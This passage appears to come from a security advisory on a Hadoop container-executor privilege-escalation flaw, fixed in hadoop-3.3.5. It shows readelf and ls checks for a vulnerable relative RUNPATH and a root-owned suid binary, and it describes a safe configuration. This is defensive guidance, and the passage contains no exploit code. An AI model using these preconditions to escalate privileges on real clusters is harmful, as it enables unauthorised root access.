YARN-10495". This patch is in hadoop-3.3.5. To determine whether a version of container-executor is vulnerable, use the readelf command. If the RUNPATH or RPATH value contains the relative path "./lib/native/" then it is at risk $ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/:../lib/native/] If it does not, then it is safe: $ readelf -d container-executor|grep 'RUNPATH\|RPATH' 0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/] For an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set $ ls -laF /opt/hadoop/bin/container-executor ---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor A safe installation lacks the suid bit; ideally is also not owned by root. $ ls -laF /opt/hadoop/bin/container-executor -rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor This configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work.

Untrusted Path

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